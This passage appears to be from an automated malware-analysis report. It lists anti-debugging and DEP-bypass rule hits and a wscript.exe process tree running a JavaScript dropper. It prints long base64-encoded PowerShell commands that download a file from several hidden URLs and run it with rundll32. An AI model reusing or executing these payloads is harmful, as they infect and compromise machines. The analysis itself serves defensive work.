QBnAEEAPQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQB4AEEAQwA0AEEATQBnAEEAeABBAEQAVQBBAEwAZwBBAHkAQQBEAFEAQQBOAGcAQQB2AEEASABRAEEATAB3AEIAVQBBAEYAWQBBAGMAdwBCAEIAQQBBAD0APQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBFAGMAQQBXAGcAQQAwAEEARgBJAEEAUwBRAEIARwBBAEYAbwBBAFEAZwBCAHUAQQBBAD0APQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAHYAQQBEAFEAQQBlAEEAQgBJAEEARwA4AEEAYwBRAEIAcwBBAEcAMABBAFcAQQBCAFYAQQBHAGsAQQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBFAE0AQQBNAGcAQgBwAEEARwBJAEEAYQBRAEIAUwBBAEgATQBBAFEAdwBCAHkAQQBFADgAQQBXAEEAQQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFQAcgBpAG0AbwBsAGUAYwB1AGwAYQByAEMAZQByAGEAdABvAGQAaQBkAGEAZQAgAGkAbgAgACQAUgBlAG0AaQBnAHIAYQB0AGkAbgBnACAALQBzAHAAbABpAHQAIAAiAFQAcABlAE4AIgApACAAewB0AHIAeQAgAHsAJABEAGUAbABpAHEAdQBpAHUAbQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIATgBBAEcAVQBBAGIAQQBCAHAAQQBIAEEAQQBiAHcAQgB1AEEARwBrAEEAYgBnAEIAaABBAEcAVQBBAFMAQQBCAHAAQQBHAHcAQQBiAEEAQgB2AEEARwBFAEEAWgBRAEIAawBBAEMANABBAFoAQQBCAHIAQQBBAD0APQBrAGIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBFAEEAZABRAEIAcABBAEgAWQBBAFoAUQBCAHkAQQBHAFUAQQBaAEEAQgBFAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGIAZwBCAGsAQQBHAFUAQQBaAEEAQgBzAEEASABrAEEATABnAEIAbQBBAEcAOABBAGMAZwBCAHoAQQBHAEUAQQBiAEEAQgBsAEEAQQA9AD0AIgA7ACQAUABvAHIAbwBwAG8AcgBvACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBuAEEARwBFAEEAYgBBAEIAbABBAEgATQBBAFkAUQBCADEAQQBIAEkAQQBkAFEAQgB6AEEARgBBAEEAYwBnAEIAdgBBAEcATQBBAFoAUQBCAHkAQQBHAGsAQQBkAEEAQgBwAEEARwBNAEEATABnAEIAaQBBAEcARQBBAGMAZwBCAG4AQQBHAEUAQQBhAFEAQgB1AEEASABNAEEAIgA7ACQAcABvAGwAZQBzAHQAYQByAFAAbwBuAHQAaQBmAGkAYwBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVAByAGkAbQBvAGwAZQBjAHUAbABhAHIAQwBlAHIAYQB0AG8AZABpAGQAYQBlACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAcABvAGwAZQBzAHQAYQByAFAAbwBuAHQAaQBmAGkAYwBlAHMAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVQBuAGQAZQByAHUAdABpAGwAaQB6AGUALgBHAG8AdgBlAHIAbgBpAG4AZwA7ACQAUwB0AHUAbgBuAGUAcgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBsAEEASABNAEEAWQB3AEIAeQBBAEcAawBBAFkAZwBCAGgAQQBHADQAQQBiAHcAQgBWAEEARwA0AEEAYwB3AEIAaABBAEcATQBBAGMAZwBCAGwAQQBHAFEAQQBMAGcAQgB5AEEARwBFAEEAWQB3AEIAcABBAEcANABBAFoAdwBBAD0AIgA7ACQAYwBvAHIAawBpAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADgAQQBjAEEAQgB3AEEARwA4AEEAYwB3AEIAcABBAEgAUQBBAGEAUQBCAHcAQQBHADgAQQBiAEEAQgBoAEEASABJAEEAUQB3AEIANQBBAEgAUQBBAGIAdwBCAHQAQQBHAGsAQQBZAHcAQgB5AEEARwA4AEEAYwB3AEIAdgBBAEcAMABBAFoAUQBBAHUAQQBHAE0AQQBiAHcAQgB2AEEARwBzAEEAYQBRAEIAdQBBAEcAYwBBAFcAUwA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGEAQQBCAHYAQQBIAFEAQQBiAHcAQgAwAEEARwBVAEEAYgBBAEIAbABBAEgATQBBAFkAdwBCAHYAQQBIAEEAQQBhAFEAQgBqAEEARgBVAEEAYgBnAEIAaABBAEgAQQBBAGMAQQBCAHMAQQBHAEUAQQBkAFEAQgBrAEEARwBVAEEAWgBBAEEAdQBBAEcATQBBAFkAUQBCAHoAQQBHAEUAQQBXAFMAPQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFYAQQBHADQAQQBaAEEAQgBsAEEASABJAEEAWgBRAEIANQBBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBhAHcAQgBwAEEASABRAEEAWQB3AEIAbwBBAEcAVQBBAGIAZwBBAD0AIgA7ACQAYgBhAHIAZwBoAGUAcwB0AHMAUwBhAHAAcgBvAGIAaQBjAGEAbABsAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFEAQQBOAFEAQQB1AEEARABJAEEATgBBAEEAMgBBAEMANABBAE4AZwBBADUAQQBDADQAQQBNAFEAQQB6AEEARABVAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVQBuAGQAZQByAHUAdABpAGwAaQB6AGUALgBHAG8AdgBlAHIAbgBpAG4AZwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQAyADkAOAA0ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARgBVAEEAYgBnAEIAawBBAEcAVQBBAGMAZwBCADEAQQBIAFEAQQBhAFEAQgBzAEEARwBrAEEAZQBnAEIAbABBAEMANABBAFIAdwBCAHYAQQBIAFkAQQBaAFEAQgB5AEEARwA0AEEAYQBRAEIAdQBBAEcAYwBBAEwAQQBCAGkAQQBHAGsAQQBiAGcAQgBrAEEARABzAEEAIgA7ACQAYgBpAGEAbgBuAHUAYQBsAGwAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbwBBAEcARQBBAGIAQQBCAHMAQQBHAEUAQQBhAEEAQQB1AEEARwBNAEEAYgB3AEIAdABBAEgAQQBBAGQAUQBCADAAQQBHAFUAQQBjAGcAQQA9AGQAWQBIAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGMAZwBCAHYAQQBHAFUAQQBiAGcAQgBzAEEARwBFAEEAYwBnAEIAbgBBAEcAVQBBAGIAUQBCAGwAQQBHADQAQQBkAEEAQgBQAEEARwBNAEEAZABBAEIAdgBBAEcAUQBBAFkAUQBCAGoAQQBIAFEAQQBlAFEAQgBzAEEARwA4AEEAZABRAEIAegBBAEMANABBAFoAdwBCAGgAQQBHAHcAQQBiAEEAQgBsAEEASABJAEEAZQBRAEEAPQBkAFkASABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEkAQQBOAGcAQQB1AEEARABFAEEATgBnAEEANQBBAEMANABBAE4AdwBBADIAQQBDADQAQQBOAFEAQQAxAEEAQQA9AD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAA7AH0AfQA=" |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
parent_process | wscript.exe | martian_process | "C:\Windows\System32\wscript.exe" "C:\ProgramData\Heteromorphic.js" blateroonPursership WhoosisInterall scatbacksNanoinstruction | ||||||
parent_process | wscript.exe | martian_process | wscript "C:\ProgramData\Heteromorphic.js" blateroonPursership WhoosisInterall scatbacksNanoinstruction | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABFAGwAdQBhAHQAZQBkAEEAcABsAGUAYwB0AHIAdQBtACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBsAEEASABFAEEAZABRAEIAcABBAEgATQBBAGEAUQBCAG4AQQBHADQAQQBZAFEAQgBzAEEAQwA0AEEAWgBRAEIAdQBBAEcAYwBBAGEAUQBCAHUAQQBHAFUAQQBaAFEAQgB5AEEAQQA9AD0AIgA7ACQAUwBjAGEAcgBjAGUAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGUAUQBCAGgAQQBHADQAQQBiAHcAQgB3AEEASABNAEEAYQBRAEIAaABBAEYAQQBBAGMAZwBCAGgAQQBHAFUAQQBjAHcAQgBwAEEARwBRAEEAYQBRAEIAaABBAEMANABBAFoAQQBCAHAAQQBIAEkAQQBaAFEAQgBqAEEASABRAEEAYgB3AEIAeQBBAEgAawBBAFIAcwBwAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGIAdwBCAHQAQQBHADAAQQBZAFEAQgB1AEEARwBRAEEAYwBnAEIAcABBAEcAVQBBAEwAZwBCADAAQQBHAGcAQQBaAFEAQgBoAEEASABRAEEAWgBRAEIAeQBBAEEAPQA9AFIAcwBwAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARABBAEcAVQBBAGMAZwBCAGgAQQBIAFUAQQBiAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFUAQQBCAGgAQQBIAEkAQQBkAEEAQgBwAEEARwBVAEEAYwB3AEEAdQBBAEcATQBBAFoAUQBCAHUAQQBIAFEAQQBaAFEAQgB5AEEAQQA9AD0AUgBzAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABnAEEATgBnAEEAdQBBAEQARQBBAE4AQQBBADMAQQBDADQAQQBOAFEAQQAwAEEAQwA0AEEATgBBAEEANABBAEEAPQA9ACIAOwAkAFIAZQBtAGkAZwByAGEAdABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AQQBBAHUAQQBEAEkAQQBNAEEAQQB3AEEAQwA0AEEATQBnAEEAMABBAEQAQQBBAEwAZwBBAHgAQQBEAFEAQQBOAEEAQQB2AEEASABvAEEAYgB3AEIAMABBAEQAZwBBAE0AZwBBAHYAQQBFAFEAQQBVAEEAQgBGAEEARwBjAEEAWQBnAEEAPQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQB4AEEAQwA0AEEATQBnAEEAeABBAEQAVQBBAEwAZwBBAHkAQQBEAFEAQQBOAGcAQQB2AEEASABRAEEATAB3AEIAVQBBAEYAWQBBAGMAdwBCAEIAQQBBAD0APQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBFAGMAQQBXAGcAQQAwAEEARgBJAEEAUwBRAEIARwBBAEYAbwBBAFEAZwBCAHUAQQBBAD0APQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAHYAQQBEAFEAQQBlAEEAQgBJAEEARwA4AEEAYwBRAEIAcwBBAEcAMABBAFcAQQBCAFYAQQBHAGsAQQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBFAE0AQQBNAGcAQgBwAEEARwBJAEEAYQBRAEIAUwBBAEgATQBBAFEAdwBCAHkAQQBFADgAQQBXAEEAQQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFQAcgBpAG0AbwBsAGUAYwB1AGwAYQByAEMAZQByAGEAdABvAGQAaQBkAGEAZQAgAGkAbgAgACQAUgBlAG0AaQBnAHIAYQB0AGkAbgBnACAALQBzAHAAbABpAHQAIAAiAFQAcABlAE4AIgApACAAewB0AHIAeQAgAHsAJABEAGUAbABpAHEAdQBpAHUAbQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIATgBBAEcAVQBBAGIAQQBCAHAAQQBIAEEAQQBiAHcAQgB1AEEARwBrAEEAYgBnAEIAaABBAEcAVQBBAFMAQQBCAHAAQQBHAHcAQQBiAEEAQgB2AEEARwBFAEEAWgBRAEIAawBBAEMANABBAFoAQQBCAHIAQQBBAD0APQBrAGIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBFAEEAZABRAEIAcABBAEgAWQBBAFoAUQBCAHkAQQBHAFUAQQBaAEEAQgBFAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGIAZwBCAGsAQQBHAFUAQQBaAEEAQgBzAEEASABrAEEATABnAEIAbQBBAEcAOABBAGMAZwBCAHoAQQBHAEUAQQBiAEEAQgBsAEEAQQA9AD0AIgA7ACQAUABvAHIAbwBwAG8AcgBvACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBuAEEARwBFAEEAYgBBAEIAbABBAEgATQBBAFkAUQBCADEAQQBIAEkAQQBkAFEAQgB6AEEARgBBAEEAYwBnAEIAdgBBAEcATQBBAFoAUQBCAHkAQQBHAGsAQQBkAEEAQgBwAEEARwBNAEEATABnAEIAaQBBAEcARQBBAGMAZwBCAG4AQQBHAEUAQQBhAFEAQgB1AEEASABNAEEAIgA7ACQAcABvAGwAZQBzAHQAYQByAFAAbwBuAHQAaQBmAGkAYwBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVAByAGkAbQBvAGwAZQBjAHUAbABhAHIAQwBlAHIAYQB0AG8AZABpAGQAYQBlACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAcABvAGwAZQBzAHQAYQByAFAAbwBuAHQAaQBmAGkAYwBlAHMAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVQBuAGQAZQByAHUAdABpAGwAaQB6AGUALgBHAG8AdgBlAHIAbgBpAG4AZwA7ACQAUwB0AHUAbgBuAGUAcgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBsAEEASABNAEEAWQB3AEIAeQBBAEcAawBBAFkAZwBCAGgAQQBHADQAQQBiAHcAQgBWAEEARwA0AEEAYwB3AEIAaABBAEcATQBBAGMAZwBCAGwAQQBHAFEAQQBMAGcAQgB5AEEARwBFAEEAWQB3AEIAcABBAEcANABBAFoAdwBBAD0AIgA7ACQAYwBvAHIAawBpAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADgAQQBjAEEAQgB3AEEARwA4AEEAYwB3AEIAcABBAEgAUQBBAGEAUQBCAHcAQQBHADgAQQBiAEEAQgBoAEEASABJAEEAUQB3AEIANQBBAEgAUQBBAGIAdwBCAHQAQQBHAGsAQQBZAHcAQgB5AEEARwA4AEEAYwB3AEIAdgBBAEcAMABBAFoAUQBBAHUAQQBHAE0AQQBiAHcAQgB2AEEARwBzAEEAYQBRAEIAdQBBAEcAYwBBAFcAUwA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGEAQQBCAHYAQQBIAFEAQQBiAHcAQgAwAEEARwBVAEEAYgBBAEIAbABBAEgATQBBAFkAdwBCAHYAQQBIAEEAQQBhAFEAQgBqAEEARgBVAEEAYgBnAEIAaABBAEgAQQBBAGMAQQBCAHMAQQBHAEUAQQBkAFEAQgBrAEEARwBVAEEAWgBBAEEAdQBBAEcATQBBAFkAUQBCAHoAQQBHAEUAQQBXAFMAPQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFYAQQBHADQAQQBaAEEAQgBsAEEASABJAEEAWgBRAEIANQBBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBhAHcAQgBwAEEASABRAEEAWQB3AEIAbwBBAEcAVQBBAGIAZwBBAD0AIgA7ACQAYgBhAHIAZwBoAGUAcwB0AHMAUwBhAHAAcgBvAGIAaQBjAGEAbABsAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFEAQQBOAFEAQQB1AEEARABJAEEATgBBAEEAMgBBAEMANABBAE4AZwBBADUAQQBDADQAQQBNAFEAQQB6AEEARABVAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVQBuAGQAZQByAHUAdABpAGwAaQB6AGUALgBHAG8AdgBlAHIAbgBpAG4AZwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQAyADkAOAA0ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARgBVAEEAYgBnAEIAawBBAEcAVQBBAGMAZwBCADEAQQBIAFEAQQBhAFEAQgBzAEEARwBrAEEAZQBnAEIAbABBAEMANABBAFIAdwBCAHYAQQBIAFkAQQBaAFEAQgB5AEEARwA0AEEAYQBRAEIAdQBBAEcAYwBBAEwAQQBCAGkAQQBHAGsAQQBiAGcAQgBrAEEARABzAEEAIgA7ACQAYgBpAGEAbgBuAHUAYQBsAGwAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbwBBAEcARQBBAGIAQQBCAHMAQQBHAEUAQQBhAEEAQQB1AEEARwBNAEEAYgB3AEIAdABBAEgAQQBBAGQAUQBCADAAQQBHAFUAQQBjAGcAQQA9AGQAWQBIAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGMAZwBCAHYAQQBHAFUAQQBiAGcAQgBzAEEARwBFAEEAYwBnAEIAbgBBAEcAVQBBAGIAUQBCAGwAQQBHADQAQQBkAEEAQgBQAEEARwBNAEEAZABBAEIAdgBBAEcAUQBBAFkAUQBCAGoAQQBIAFEAQQBlAFEAQgBzAEEARwA4AEEAZABRAEIAegBBAEMANABBAFoAdwBCAGgAQQBHAHcAQQBiAEEAQgBsAEEASABJAEEAZQBRAEEAPQBkAFkASABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEkAQQBOAGcAQQB1AEEARABFAEEATgBnAEEANQBBAEMANABBAE4AdwBBADIAQQBDADQAQQBOAFEAQQAxAEEAQQA9AD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAA7AH0AfQA=" | ||||||
parent_process | wscript.exe | martian_process | powershell -encodedcommand "JABFAGwAdQBhAHQAZQBkAEEAcABsAGUAYwB0AHIAdQBtACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBsAEEASABFAEEAZABRAEIAcABBAEgATQBBAGEAUQBCAG4AQQBHADQAQQBZAFEAQgBzAEEAQwA0AEEAWgBRAEIAdQBBAEcAYwBBAGEAUQBCAHUAQQBHAFUAQQBaAFEAQgB5AEEAQQA9AD0AIgA7ACQAUwBjAGEAcgBjAGUAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGUAUQBCAGgAQQBHADQAQQBiAHcAQgB3AEEASABNAEEAYQBRAEIAaABBAEYAQQBBAGMAZwBCAGgAQQBHAFUAQQBjAHcAQgBwAEEARwBRAEEAYQBRAEIAaABBAEMANABBAFoAQQBCAHAAQQBIAEkAQQBaAFEAQgBqAEEASABRAEEAYgB3AEIAeQBBAEgAawBBAFIAcwBwAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGIAdwBCAHQAQQBHADAAQQBZAFEAQgB1AEEARwBRAEEAYwBnAEIAcABBAEcAVQBBAEwAZwBCADAAQQBHAGcAQQBaAFEAQgBoAEEASABRAEEAWgBRAEIAeQBBAEEAPQA9AFIAcwBwAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARABBAEcAVQBBAGMAZwBCAGgAQQBIAFUAQQBiAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFUAQQBCAGgAQQBIAEkAQQBkAEEAQgBwAEEARwBVAEEAYwB3AEEAdQBBAEcATQBBAFoAUQBCAHUAQQBIAFEAQQBaAFEAQgB5AEEAQQA9AD0AUgBzAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABnAEEATgBnAEEAdQBBAEQARQBBAE4AQQBBADMAQQBDADQAQQBOAFEAQQAwAEEAQwA0AEEATgBBAEEANABBAEEAPQA9ACIAOwAkAFIAZQBtAGkAZwByAGEAdABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AQQBBAHUAQQBEAEkAQQBNAEEAQQB3AEEAQwA0AEEATQBnAEEAMABBAEQAQQBBAEwAZwBBAHgAQQBEAFEAQQBOAEEAQQB2AEEASABvAEEAYgB3AEIAMABBAEQAZwBBAE0AZwBBAHYAQQBFAFEAQQBVAEEAQgBGAEEARwBjAEEAWQBnAEEAPQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQB4AEEAQwA0AEEATQBnAEEAeABBAEQAVQBBAEwAZwBBAHkAQQBEAFEAQQBOAGcAQQB2AEEASABRAEEATAB3AEIAVQBBAEYAWQBBAGMAdwBCAEIAQQBBAD0APQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBFAGMAQQBXAGcAQQAwAEEARgBJAEEAUwBRAEIARwBBAEYAbwBBAFEAZwBCAHUAQQBBAD0APQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAHYAQQBEAFEAQQBlAEEAQgBJAEEARwA4AEEAYwBRAEIAcwBBAEcAMABBAFcAQQBCAFYAQQBHAGsAQQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBFAE0AQQBNAGcAQgBwAEEARwBJAEEAYQBRAEIAUwBBAEgATQBBAFEAdwBCAHkAQQBFADgAQQBXAEEAQQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFQAcgBpAG0AbwBsAGUAYwB1AGwAYQByAEMAZQByAGEAdABvAGQAaQBkAGEAZQAgAGkAbgAgACQAUgBlAG0AaQBnAHIAYQB0AGkAbgBnA